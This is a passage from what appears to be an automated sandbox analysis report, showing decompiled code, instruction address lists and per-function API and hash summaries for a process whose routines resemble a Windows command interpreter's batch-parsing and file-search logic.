																			if( *((short*)(_t166 + 0x10)) == 0x3c) {
																				_t149 = 0x8000;
																				_t85 = E0015D120(_t125, 0x8000);
																				 *(_t180 - 0x224) = _t85;
																				__eflags = _t85 - _t175;
																				if(_t85 != _t175) {
																					goto L45;
																				} else {
																					_t90 = E00163320(L"DPATH");
																					__eflags = _t90;
																					if(_t90 == 0) {
																						goto L77;
																					} else {
																						_t132 =  *(_t180 - 0x18);
																						__eflags = _t132;
																						if(_t132 == 0) {
																							_t132 = _t180 - 0x220;
																						}
																						_t91 = SearchPathW(_t90,  *(_t166 + 4), _t104,  *(_t180 - 0x10), _t132, _t104);
																						__eflags = _t91;
																						if(_t91 == 0) {
																							goto L77;
																						} else {
																							_t125 =  *(_t180 - 0x18);
																							__eflags = _t125;
																							if(_t125 == 0) {
																								_t125 = _t180 - 0x220;
																							}
																							_push(_t125);
																							_t149 = 0x8000;
																							goto L44;
																						}
																					}
																				}
																			} else {
																				asm("sbb edx, edx");
																				_t149 = ( ~( *(_t166 + 0xc)) & 0xfffffe09) + 0x301;
																				__eflags = ( ~( *(_t166 + 0xc)) & 0xfffffe09) + 0x301;
																				L44:
																				_t85 = E0015D120(_t125, _t149);
																				 *(_t180 - 0x224) = _t85;
																				__eflags = _t85 - _t175;
																				if(_t85 == _t175) {
																					L77:
																					E0015D937();
																					E0017985A( *0x193cf0);
																					goto L52;
																				} else {
																					L45:
																					__eflags = _t85 -  *_t166;
																					if(_t85 !=  *_t166) {
																						_t149 =  *_t166;
																						_t86 = E0015DBFC(_t85,  *_t166);
																						_t127 =  *(_t180 - 0x224);
																						_t177 = _t86;
																						E0015DB92( *(_t180 - 0x224));
																						__eflags = _t177 - 0xffffffff;
																						if(_t177 == 0xffffffff) {
																							L76:
																							E0015D937();
																							E0016274C(0x193d00, 0x104, L"%d",  *_t166);
																							E0015C5A2(_t127, 0x2344, 1, 0x193d00);
																							goto L52;
																						} else {
																							_t85 =  *_t166;
																							_t175 = _t177 | 0xffffffff;
																							goto L46;
																						}
																					} else {
																						L46:
																						__eflags = _t85 - _t175;
																						if(_t85 == _t175) {
																							goto L77;
																						} else {
																							 *( *(_t180 - 0x228) + 4) = _t85;
																							goto L48;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
													goto L49;
													L48:
													_t76 =  *(_t166 + 0x14);
													_t166 = _t76;
													__eflags = _t76;
												} while (_t76 != 0);
											}
										}
									}
									L49:
									__imp__??_V@YAXPAX@Z( *(_t180 - 0x18));
									_pop(_t167);
									_pop(_t174);
									__eflags =  *(_t180 - 4) ^ _t180;
									_pop(_t105);
									return E00166FD0(_t104, _t105,  *(_t180 - 4) ^ _t180, _t149, _t167, _t174);
									goto L78;
								}
							} else {
								 *(_t171 + 0x44) = _t68;
								E00161040(_t68,  *0x18fa8c, 0x18faa0);
								_t144 = 0x2c;
								_t100 = E0015DC74(_t104, _t144);
								 *(_t171 + 0x48) = _t100;
								__eflags = _t100;
								if(_t100 == 0) {
									E001782EB(_t144);
								}
								goto L13;
							}
						} else {
							E0015F300(_t66, 0, 0, 0);
							goto L13;
						}
					}
				}
				L78:
			}



















































                                  0x0015d803
                                  0x0015d812
                                  0x0015d814
                                  0x0015d81c
                                  0x0015d81e
                                  0x0016b9cf
                                  0x0016b9d5
                                  0x0016b9d5
                                  0x0015d826
                                  0x0015d82c
                                  0x0015d830
                                  0x0016b9dd
                                  0x0016b9de
                                  0x0016b9e6
                                  0x0016b9e7
                                  0x0016b9ef
                                  0x0015d836
                                  0x0015d838
                                  0x0015d838
                                  0x0015d83f
                                  0x0015d840
                                  0x0015d847
                                  0x0016b9fa
                                  0x0016b9fe
                                  0x00000000
                                  0x0015d84d
                                  0x0015d84d
                                  0x0015d855
                                  0x0015d871
                                  0x0015d873
                                  0x0015d877
                                  0x0015d857
                                  0x0015d861
                                  0x0015d86b
                                  0x0015d91b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0015d86b
                                  0x0015d87e
                                  0x0015d883
                                  0x0015d888
                                  0x0015d921
                                  0x0015d924
                                  0x0015d932
                                  0x0015d932
                                  0x0015d926
                                  0x0015d926
                                  0x0015d894
                                  0x0015d895
                                  0x0015d89a
                                  0x0015d89f
                                  0x0016ba09
                                  0x0016ba09
                                  0x0015d8ac
                                  0x0015d8d7
                                  0x0015d8dc
                                  0x0015d8ae
                                  0x0015d8b0
                                  0x0015d8c0
                                  0x0015d8ca
                                  0x0015d8e2
                                  0x0015d8e5
                                  0x0015d8ea
                                  0x0015d8ec
                                  0x0016ba13
                                  0x0016ba1f
                                  0x0016ba25
                                  0x0016ba26
                                  0x0016ba26
                                  0x0016ba28
                                  0x0015da46
                                  0x0015da46
                                  0x0015da49
                                  0x0015da4b
                                  0x0015da4d
                                  0x00000000
                                  0x00000000
                                  0x0015d9f1
                                  0x0015d9f4
                                  0x0015d9f6
                                  0x0015d9f9
                                  0x0015d9f9
                                  0x0015d9fc
                                  0x0015d9ff
                                  0x0015d9ff
                                  0x0015da08
                                  0x0015da10
                                  0x0015da14
                                  0x0015da19
                                  0x0015da1c
                                  0x0015da1e
                                  0x0015da21
                                  0x0015da23
                                  0x0015da26
                                  0x0015da26
                                  0x0015da29
                                  0x0015da2c
                                  0x0015da2c
                                  0x0015da35
                                  0x0015da36
                                  0x0015da39
                                  0x0015da3b
                                  0x0015da40
                                  0x00000000
                                  0x00000000
                                  0x0015da40
                                  0x0015da39
                                  0x0015da1c
                                  0x0015da4f
                                  0x0015da55
                                  0x0015da5b
                                  0x0015da5e
                                  0x0016ba31
                                  0x0016ba36
                                  0x00000000
                                  0x0015da64
                                  0x0015da66
                                  0x0015da67
                                  0x0015da6c
                                  0x0015da72
                                  0x0015da74
                                  0x0015db8d
                                  0x0015db8f
                                  0x0015da7a
                                  0x0015da80
                                  0x0015da83
                                  0x0015da88
                                  0x0015da8b
                                  0x0015da8d
                                  0x0015da8d
                                  0x0015da90
                                  0x0015da92
                                  0x0015da98
                                  0x0015da98
                                  0x0015da9b
                                  0x0015da9b
                                  0x0015da9e
                                  0x00000000
                                  0x0015daa4
                                  0x0015daa6
                                  0x0015daad
                                  0x0015daaf
                                  0x0016ba90
                                  0x0016ba90
                                  0x00000000
                                  0x0015dab5
                                  0x0015dab7
                                  0x0015dabe
                                  0x0015dac1
                                  0x00000000
                                  0x0015dac7
                                  0x0015dac9
                                  0x0015dace
                                  0x0015dad0
                                  0x0016ba43
                                  0x0016ba48
                                  0x0016ba4a
                                  0x00000000
                                  0x0016ba50
                                  0x0016ba56
                                  0x0016ba5c
                                  0x0016ba5e
                                  0x0016ba64
                                  0x0016ba66
                                  0x00000000
                                  0x0016ba6c
                                  0x0016ba7e
                                  0x0016ba83
                                  0x0016ba84
                                  0x0016ba86
                                  0x00000000
                                  0x0016ba86
                                  0x0016ba66
                                  0x0015dad6
                                  0x0015dad6
                                  0x0015dad6
                                  0x0015dad8
                                  0x0015dadd
                                  0x0015dae0
                                  0x0015dae2
                                  0x0016bb36
                                  0x0016bb3b
                                  0x0016bb3c
                                  0x0016bb3e
                                  0x0016bb43
                                  0x0016bb43
                                  0x0016bb4b
                                  0x0016bb4e
                                  0x00000000
                                  0x0015dae8
                                  0x0015daea
                                  0x0015daef
                                  0x0015daef
                                  0x0015daf2
                                  0x0015daf6
                                  0x0015db6f
                                  0x0015db76
                                  0x0015db7c
                                  0x0015db7f
                                  0x0015db84
                                  0x0015db86
                                  0x00000000
                                  0x0015db88
                                  0x00000000
                                  0x0015db88
                                  0x0015daf8
                                  0x0015daf8
                                  0x0015dafd
                                  0x0015dafe
                                  0x0016ba98
                                  0x0016ba9d
                                  0x0016baa2
                                  0x0016baa8
                                  0x0016baaa
                                  0x00000000
                                  0x0016bab0
                                  0x0016bab5
                                  0x0016baba
                                  0x0016babc
                                  0x00000000
                                  0x0016bac2
                                  0x0016bac2
                                  0x0016bac5
                                  0x0016bac7
                                  0x0016bac9
                                  0x0016bac9
                                  0x0016bad9
                                  0x0016badf
                                  0x0016bae1
                                  0x00000000
                                  0x0016bae7
                                  0x0016bae7
                                  0x0016baea
                                  0x0016baec
                                  0x0016baee
                                  0x0016baee
                                  0x0016baf4
                                  0x0016baf5
                                  0x00000000
                                  0x0016baf5
                                  0x0016bae1
                                  0x0016babc
                                  0x0015db04
                                  0x0015db09
                                  0x0015db11
                                  0x0015db11
                                  0x0015db17
                                  0x0015db17
                                  0x0015db1c
                                  0x0015db22
                                  0x0015db24
                                  0x0016bb89
                                  0x0016bb89
                                  0x0016bb94
                                  0x00000000
                                  0x0015db2a
                                  0x0015db2a
                                  0x0015db2a
                                  0x0015db2c
                                  0x0016baff
                                  0x0016bb03
                                  0x0016bb08
                                  0x0016bb0e
                                  0x0016bb10
                                  0x0016bb15
                                  0x0016bb18
                                  0x0016bb58
                                  0x0016bb58
                                  0x0016bb6f
                                  0x0016bb7c
                                  0x00000000
                                  0x0016bb1a
                                  0x0016bb1a
                                  0x0016bb1c
                                  0x00000000
                                  0x0016bb1c
                                  0x0015db32
                                  0x0015db32
                                  0x0015db32
                                  0x0015db34
                                  0x00000000
                                  0x0015db3a
                                  0x0015db40
                                  0x00000000
                                  0x0015db40
                                  0x0015db34
                                  0x0015db2c
                                  0x0015db24
                                  0x0015dafe
                                  0x0015daf6
                                  0x0015dae2
                                  0x0015dad0
                                  0x0015dac1
                                  0x0015daaf
                                  0x00000000
                                  0x0015db43
                                  0x0015db43
                                  0x0015db46
                                  0x0015db48
                                  0x0015db48
                                  0x0015da9b
                                  0x0015da92
                                  0x0015da74
                                  0x0015db50
                                  0x0015db53
                                  0x0015db5f
                                  0x0015db60
                                  0x0015db61
                                  0x0015db63
                                  0x0015db6c
                                  0x00000000
                                  0x0015db6c
                                  0x0015d8f2
                                  0x0015d8fb
                                  0x0015d8fe
                                  0x0015d905
                                  0x0015d906
                                  0x0015d90b
                                  0x0015d90e
                                  0x0015d910
                                  0x0015d912
                                  0x0015d912
                                  0x00000000
                                  0x0015d910
                                  0x0015d8cc
                                  0x0015d8d2
                                  0x00000000
                                  0x0015d8d2
                                  0x0015d8ca
                                  0x0015d8ac
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: _wcsicmp
                                  • String ID: ELSE$IF/?
                                  • API String ID: 2081463915-1134991328
                                  • Opcode ID: 1ed971f407525b9c7ab5c5aeabf792ec6a6f7aaf0abaf8f6a57fa8f6beef4e92
                                  • Instruction ID: d922592d533eb30ff536eb6b80ec2e8b7f9778555cf569c826bf6aa2f0602d66
                                  • Opcode Fuzzy Hash: 1ed971f407525b9c7ab5c5aeabf792ec6a6f7aaf0abaf8f6a57fa8f6beef4e92
                                  • Instruction Fuzzy Hash: AF613831604601DBDB38AF35EC8562A73A1EF84322B25452EE826DF6E1EF71DC99C740
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001668BA, Relevance: 15.1, APIs: 10, Instructions: 114memoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000037,00000000,00000000,00000002,00000000,?,00000000,00166A00,00166A00,?,0015AE4F,00000037,00000000,?), ref: 001668E6
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,0015AE4F,00000037,00000000,?,?), ref: 0016696A
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,0015AE4F,00000037,00000000,?,?), ref: 0016697B
                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0015AE4F,00000037,00000000,?,?), ref: 00166982
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,0015AE4F,00000037,00000000,?,?), ref: 001669B7
                                  • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0015AE4F,00000037,00000000,?,?), ref: 001669BE
                                  • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000037,?,0015AE4F,00000037,00000000,?,?), ref: 001669DA
                                  • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(0015AE4F,?,0015AE4F,00000037,00000000,?,?), ref: 001669ED
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Heap$Find$AllocFileProcess$CloseErrorFirstLastNext
                                  • String ID:
                                  • API String ID: 1047556133-0
                                  • Opcode ID: 8f1dc0dd1fb2906c9b9f8aaeb5a599f9e94eaf33299e730b732acd22a5c8a638
                                  • Instruction ID: 280dcbc9f8d47a30cb8b821bdc564f28ea6444474c0d411cde999c32ddcbb0ed
                                  • Opcode Fuzzy Hash: 8f1dc0dd1fb2906c9b9f8aaeb5a599f9e94eaf33299e730b732acd22a5c8a638
                                  • Instruction Fuzzy Hash: 3F410530200205EFDB148F28DC09A697BB9FF49325F14421EFDA6976E0DB319891CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00176D90, Relevance: 13.6, APIs: 9, Instructions: 67filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00176DB3
                                  • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00176DC5
                                  • fprintf.MSVCRT ref: 00176DEB
                                  • fflush.MSVCRT ref: 00176DF9
                                  • TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20), ref: 00176E12
                                  • NtCancelSynchronousIoFile.NTDLL(00000000,00000000), ref: 00176E28
                                  • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00197F20), ref: 00176E2F
                                  • _get_osfhandle.MSVCRT ref: 00176E4C
                                  • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00176E54
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
                                  • String ID:
                                  • API String ID: 3139166086-0
                                  • Opcode ID: 4d2b99d0a7b7b57d3582d3f0d460b48292af025d3d2cfebdec1a3b17281eef31
                                  • Instruction ID: 757a90c08973422f666773f3be2038592a0f843f5c4ff51158b43cb2afd76814
                                  • Opcode Fuzzy Hash: 4d2b99d0a7b7b57d3582d3f0d460b48292af025d3d2cfebdec1a3b17281eef31
                                  • Instruction Fuzzy Hash: 0011D031505200BBDB21AF78EC4EB6A7B78EB05B16F14801EF929919E1DB714AD1C760
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00155E70, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 292COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: _wcsnicmpswscanf
                                  • String ID: :EOF
                                  • API String ID: 1534968528-551370653
                                  • Opcode ID: 7b39c78961f025627a670c11414dcfecb204e1047664a4694a88c40ba173f42b
                                  • Instruction ID: 32d213a098d7ce2f9612e6e3d2c946132c46e6b0bc3bffe8bdae97401b948b56
                                  • Opcode Fuzzy Hash: 7b39c78961f025627a670c11414dcfecb204e1047664a4694a88c40ba173f42b
                                  • Instruction Fuzzy Hash: 3AA1EE31A04219DFDB24DF68C8957BAB7F4FF04302F54401AEC52EB281E7659E99CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001558A4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _setjmp3.MSVCRT ref: 001558E1
                                    • Part of subcall function 001636CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,0015590A,00000000), ref: 001636F0
                                    • Part of subcall function 001600B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000), ref: 001600C1
                                    • Part of subcall function 001600B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000,?), ref: 001600C8
                                  • NtQueryInformationProcess.NTDLL(000000FF,00000027,?,00000004,00000000), ref: 00155991
                                  • NtSetInformationProcess.NTDLL(000000FF,00000027,?,00000004), ref: 001559AF
                                  • NtSetInformationProcess.NTDLL(000000FF,00000027,?,00000004), ref: 00155A17
                                  • longjmp.MSVCRT(0018B8B8,00000001,00000000), ref: 0016981B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
                                  • String ID: %9d
                                  • API String ID: 4212706909-2241623522
                                  • Opcode ID: 277d73357ea8f8cc6cd94e11049978083289f7f61d8a8a0bbd6231f8c40d1d6b
                                  • Instruction ID: d0d450ccb844bb73dfcbc9a604469fad2431fd2d70c12813a4e79d5b5f46db8c
                                  • Opcode Fuzzy Hash: 277d73357ea8f8cc6cd94e11049978083289f7f61d8a8a0bbd6231f8c40d1d6b
                                  • Instruction Fuzzy Hash: B641B470E04314EFD710DF69AC45A6ABBF8EF45B14F10421AF928E7691EB705981CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00155226, Relevance: 9.5, APIs: 6, Instructions: 458COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 0015528C
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,00000000,?), ref: 00155394
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 001553D5
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: memset$FullNamePath
                                  • String ID:
                                  • API String ID: 3158150540-0
                                  • Opcode ID: 110617fdc3f51febd3b3f382173755aae2a3af4da3a643c1ec7b0eb588229e1b
                                  • Instruction ID: bee78d1e60eef6ff5d11704f8677372f1d9aeca601a5c963114e0b733b32e566
                                  • Opcode Fuzzy Hash: 110617fdc3f51febd3b3f382173755aae2a3af4da3a643c1ec7b0eb588229e1b
                                  • Instruction Fuzzy Hash: A602A435A00115DBCB28DF68CC946BAB3B6FF98314F1981E9D8199B354D734AE96CF40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0016245C, Relevance: 9.2, APIs: 6, Instructions: 154fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,00000000), ref: 001624EC
                                  • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00162505
                                  • memcpy.MSVCRT ref: 00162566
                                  • _wcsnicmp.MSVCRT ref: 001625BC
                                  • _wcsicmp.MSVCRT ref: 0016D61E
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
                                  • String ID:
                                  • API String ID: 242869866-0
                                  • Opcode ID: 07a806efe8d435004e7f4d4efafa91d66cc569cced9d3372d67d4deff634b8d1
                                  • Instruction ID: fe347b3a3e632b7074661b1b0449136daa1108dc1417d8ebf4f649520bab1109
                                  • Opcode Fuzzy Hash: 07a806efe8d435004e7f4d4efafa91d66cc569cced9d3372d67d4deff634b8d1
                                  • Instruction Fuzzy Hash: 9A51BF75A087018BCB24CF28DC545ABB7E5AFD8310F154A2EF89AC3240EB31D965CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0017A0D2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 0017A118
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,-00000105,?,?,?), ref: 0017A1B5
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0017A225
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: memset$DiskFreeSpace
                                  • String ID: %5lu
                                  • API String ID: 2448137811-2100233843
                                  • Opcode ID: 90ff02eb5dc6d78e3f859dd1b5e81b3ab8827b8fe114379c91ca5cbe74476713
                                  • Instruction ID: a17e04c26b5516b9a6aa2da34b78ba860cbbdde56f2267c6a0aa495800a5d495
                                  • Opcode Fuzzy Hash: 90ff02eb5dc6d78e3f859dd1b5e81b3ab8827b8fe114379c91ca5cbe74476713
                                  • Instruction Fuzzy Hash: 2641C472A00218ABDB21EBA4DC85AFEB7B8FF58304F444099F909A7141E7709F85CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015AC30, Relevance: 6.1, APIs: 4, Instructions: 61memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 0015AC8E
                                  • RtlFreeHeap.NTDLL(00000000), ref: 0015AC95
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 0015ACBE
                                  • RtlFreeHeap.NTDLL(00000000), ref: 0015ACC5
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 874ca963cab275d8ed2056134c84204dc8292f04a97924bde843e3decab678b6
                                  • Instruction ID: bd3ea9b429e3ebc7f156bf49a966007902f7f76d603d3a44a52655eb19a8364e
                                  • Opcode Fuzzy Hash: 874ca963cab275d8ed2056134c84204dc8292f04a97924bde843e3decab678b6
                                  • Instruction Fuzzy Hash: 6F11E631240640DBCB249F6CD85977A3BB1BF45322F64495EE8BBCF652CB20D845D762
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001731DC, Relevance: 4.8, APIs: 3, Instructions: 274fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,0015250C,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00173362
                                  • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000010), ref: 001734BF
                                  • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 001734D6
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Find$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 3541575487-0
                                  • Opcode ID: 4c58f0b84a7c4378fe6094c0c610d570d31520b9813089e83d1e2b57c489d092
                                  • Instruction ID: 3a1807c6b32b3f006cbf530e33c3d5a24f44f1b944c662e4627d77f6867330e2
                                  • Opcode Fuzzy Hash: 4c58f0b84a7c4378fe6094c0c610d570d31520b9813089e83d1e2b57c489d092
                                  • Instruction Fuzzy Hash: 6591D3316042018BCB29EF28C84156BB7F6FFA8344B49892DE9AAC7350EB31DE45D791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015443C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,0017731D,?,?,?,?,?), ref: 00154442
                                    • Part of subcall function 00154476: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 0015449A
                                    • Part of subcall function 00154476: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 001544BE
                                    • Part of subcall function 00154476: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 001544C9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: CloseOpenQueryValueVersion
                                  • String ID: %d.%d.%05d.%d
                                  • API String ID: 2996790148-3457777122
                                  • Opcode ID: 593b474be3aab4871ed498e5414b8c301766d3ef4a4a311285a218b5c9ad4549
                                  • Instruction ID: b1631d9fdd5797f471ce51f033e5969ea22840574634a1accf663c7666ff0090
                                  • Opcode Fuzzy Hash: 593b474be3aab4871ed498e5414b8c301766d3ef4a4a311285a218b5c9ad4549
                                  • Instruction Fuzzy Hash: 3FD02BB175112037D614666A0C4AF7B608DC7D8113740402FFC01972C2DAB96C2941B4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00173C49, Relevance: 3.0, APIs: 2, Instructions: 43timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000000,?,00169AFE,0017F830,?,00002000), ref: 00173C66
                                  • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,00000000,?,00169AFE,0017F830,?,00002000), ref: 00173CB2
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Time$System$File
                                  • String ID:
                                  • API String ID: 2838179519-0
                                  • Opcode ID: 5cf48bc6c77e60f1f2d39184149cd8aa5b8e1d17ee7af554d56a3a3c71991c00
                                  • Instruction ID: a756d3de1ef4c6830d42c5904afcd0a878bce5645f73850b37c87b16b829bcfd
                                  • Opcode Fuzzy Hash: 5cf48bc6c77e60f1f2d39184149cd8aa5b8e1d17ee7af554d56a3a3c71991c00
                                  • Instruction Fuzzy Hash: BF01402D910249EACB04EFE4D9005EEB374EF18704B20909EEC19E7710E7329E43C7AA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00172258, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                  Download Yara Rule
                                  APIs
                                  • IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0(?,00000006,?,00172418), ref: 0017228B
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
